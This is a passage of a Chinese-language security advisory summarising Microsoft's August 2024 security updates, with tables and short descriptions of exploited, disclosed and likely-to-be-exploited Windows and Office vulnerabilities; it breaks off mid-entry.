16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">2024年8月14日，天融信阿尔法实验室监测到微软官方发布了8月安全更新。此次更新共修复90个漏洞（不包含3个外部分配漏洞和本月早些时候发布的9个Edge漏洞），其中7个严重漏洞(Critical)、80个重要漏洞(Important)、3个中危漏洞(Moderate)。其中权限提升漏洞36个、远程代码执行漏洞30个、信息泄露漏洞9个、拒绝服务漏洞6个、欺骗漏洞5个、安全功能绕过漏洞1个、XSS漏洞2个、篡改漏洞1个。</span><br/></p><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px 8px;text-indent: 0em;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgb(0, 0, 0);">本次微软安全更新涉及组件包括：Windows Kernel、Windows Power Dependency Coordinator、Windows Scripting、Microsoft Office Project、Windows Ancillary Function Driver for WinSock、Windows Mark of the Web (MOTW)、Windows Secure Kernel Mode、Line Printer Daemon Service (LPD)、Microsoft Office、Windows Update Stack、Windows TCP/IP、Microsoft Streaming Service、Windows DWM Core Library、Windows Transport Security Layer (TLS)、Windows Common Log File System Driver、Windows Print Spooler Components等多个产品和组件。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px 8px;text-indent: 0em;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgb(0, 0, 0);">微软本次修复中，CVE-2024-38106、CVE-2024-38107、CVE-2024-38178、CVE-2024-38189、CVE-2024-38193、CVE-2024-38213被在野利用，CVE-2024-21302、CVE-2024-38199、CVE-2024-38200、CVE-2024-38202被公开披露。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="margin-bottom: 0px;letter-spacing: 0.578px;white-space: normal;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;">0x01 </span></strong><span style="font-size: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;"><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">重点</span></strong><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">漏洞描述</span></strong></span></strong></span><br/></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><section style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);">本次微软更新中重点漏洞的信息如下所示。<br/></span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;font-size: 16px;"><p style="margin-bottom: 8px;text-align: left;margin-top: 0px;"><span style="font-size: 16px;"><strong>在野利用和公开披露漏洞</strong></span></p></li></ul><table align="center" data-sort="sortDisabled" width="578"><tbody><tr><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">CVE</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">漏洞名称</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">CVSS3.1</span></td></tr><tr><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;">CVE-2024-38106</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;">Windows Kernel本地权限提升漏洞</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;">7.0/6.5</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;">CVE-2024-38107</span></td><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;">Windows Power Dependency Coordinator本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;">7.8/7.2</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="border-left-color: rgb(221, 221, 221);border-top-color: rgb(221, 221, 221);"><span style="font-size: 14px;">CVE-2024-38178</span></td><td valign="top" colspan="1" rowspan="1" style="border-left-color: rgb(221, 221, 221);border-top-color: rgb(221, 221, 221);"><span style="font-size: 14px;">Jscript9脚本引擎内存损坏漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="border-left-color: rgb(221, 221, 221);border-top-color: rgb(221, 221, 221);"><span style="font-size: 14px;">7.5/7.0</span></td></tr><tr><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">CVE-2024-38189</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">Microsoft Project远程代码执行漏洞</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">8.8/8.2</span></td></tr><tr><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">CVE-2024-38193</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">Windows WinSock辅助功能驱动本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">7.8/7.2</span></td></tr><tr><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">CVE-2024-38213</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">Windows网络标记(MOTW)安全功能绕过漏洞</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">6.5/6.0</span></td></tr><tr><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">CVE-2024-21302</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">Windows Secure Kernel Mode本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">6.7/6.1</span></td></tr><tr><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">CVE-2024-38199</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">Windows Line Printer Daemon(LPD)服务远程代码执行漏洞</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">9.8/8.5</span></td></tr><tr><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">CVE-2024-38200</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">Microsoft Office欺骗漏洞</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">6.5/5.7</span></td></tr><tr><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">CVE-2024-38202</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">Windows Update Stack本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">7.3/6.9</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-bottom: 8px;text-align: left;margin-top: 0px;"><span style="letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);font-size: 14px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38106：Windows Kernel本地权限提升漏洞</span></span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">该漏洞已发现在野利用。此漏洞是Windows Kernel中的敏感数据存储于加锁不恰当的内存区域漏洞（CWE-591）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。成功利用此漏洞需要攻击者赢得竞争条件。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 8px 0px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38107：Windows Power Dependency Coordinator本地权限提升漏洞</span></span></span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">该漏洞已发现在野利用。此漏洞是Windows Power Dependency Coordinator中的释放后重用UAF漏洞（CWE-416）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span><br/></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38178：Jscript9脚本引擎内存损坏漏洞</span></span></span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">该漏洞已发现在野利用。此漏洞是Windows Jscript9脚本引擎中的类型混淆漏洞（CWE-843）。未经身份认证的远程攻击者通过向经过身份认证的受害者发送特制的URL，并说服受害者用Edge打开该URL来利用此漏洞，成功利用此漏洞的攻击者可以获得在受害者系统上下文执行任意代码的能力。此漏洞在Microsoft Edge的Internet Explorer模式下触发。</span><br/></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38189：Microsoft Project远程代码执行漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞已发现在野利用。此漏洞是Microsoft Project中的不正确输入验证漏洞（CWE-20）。要利用该漏洞，需要受害者在系统上打开恶意的Microsoft Office Project文件，但该系统中的“阻止宏通过Internet在Office文件中运行”策略已被禁用，并且“VBA宏通知设置”也未启用，从而允许攻击者执行远程代码执行。此漏洞可通过“电子邮件”和“Web网站”两种场景进行利用。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38193：Windows WinSock辅助功能驱动本地权限提升漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞已发现在野利用。此漏洞是Windows WinSock辅助功能驱动中的释放后重用UAF漏洞（CWE-416）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38213：Windows网络标记(MOTW)安全功能绕过漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞已发现在野利用。此漏洞是Windows网络标记(MOTW)中的保护机制缺失漏洞（CWE-693）。远程攻击者通过受害者发送恶意文件并诱使他们打开它来利用此漏洞，成功利用此漏洞的攻击者可以绕过SmartScreen安全功能。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-21302：Windows Secure Kernel Mode本地权限提升漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞被公开披露。此漏洞是Windows Secure Kernel Mode中的不正确访问控制漏洞（CWE-284）。此漏洞允许具有管理员权限的攻击者将当前版本的Windows系统文件替换为旧版本。通过利用此漏洞，攻击者可以重新引入之前已缓解的漏洞，绕过VBS的某些功能，并窃取受VBS保护的数据。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38199：Windows Line Printer Daemon(LPD)服务远程代码执行漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞被公开披露。此漏洞是Windows Line Printer Daemon(LPD)服务中的释放后重用UAF漏洞（CWE-416）。未经身份认证的远程攻击者通过向共享的易受攻击的Windows行式打印机守护程序(LPD)服务发送特制的打印任务来利用此漏洞，成功利用此漏洞可能导致在服务器上执行任意代码。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38200：Microsoft Office欺骗漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞被公开披露。此漏洞是Microsoft Office中的向未经授权的行为者泄露敏感信息漏洞（CWE-200）。远程攻击者通过创建一个恶意网站（其中包含利用此漏洞的特制文件），然后向受害者发送该网站的链接，并说服受害者点击该链接和打开文件来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的NTLM凭据。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38202：Windows Update Stack本地权限提升漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞被公开披露。此漏洞是Windows Update Stack中的不正确的访问控制漏洞（CWE-284）。具有基本用户权限的攻击者能够重新引入之前已缓解的漏洞或绕过VBS的某些功能。要成功利用此漏洞，攻击者必须说服或诱骗管理用户执行系统还原。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);font-size: 16px;">漏洞利用可能性较大的漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="329" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td width="65" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38063</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows TCP/IP远程代码执行漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">9.8/8.5</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38125</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Kernel Streaming WOW Thunk服务驱动本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38144</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Kernel Streaming WOW Thunk服务驱动权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38133</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Kernel本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38141</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows WinSock辅助功能驱动本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38147</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft DWM核心库本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38150</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft DWM核心库本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38148</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Secure Channel拒绝服务漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.5/6.5</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38163</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Update Stack本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38196</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows通用日志文件系统驱动本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38198</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Print Spooler权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.5/6.5</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38063：Windows TCP/IP远程代码执行漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">此漏洞是Windows TCP/IP中的整数下溢或回绕漏洞（CWE-191）。未经身份认证的攻击者可以向Windows计算机反复发送包含特制数据包的IPv6数据包，从而可以实现远程代码执行。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">临时缓解措施：如果目标系统禁用IPv6，系统不会受到影响。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38125、CVE-2024-38144：Kernel Streaming WOW Thunk服务驱动权限提升漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38125是Kernel Streaming WOW Thunk服务驱动中的数字截断错误（CWE-197）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38144是Kernel Streaming WOW Thunk服务驱动中的整数上溢或回绕漏洞（CWE-190）。经过普通用户身份认证的远程攻击者通过将特制的数据传递给目标系统来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38133：Windows Kernel本地权限提升漏洞</span></span></span><br/></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">该漏洞是Windows 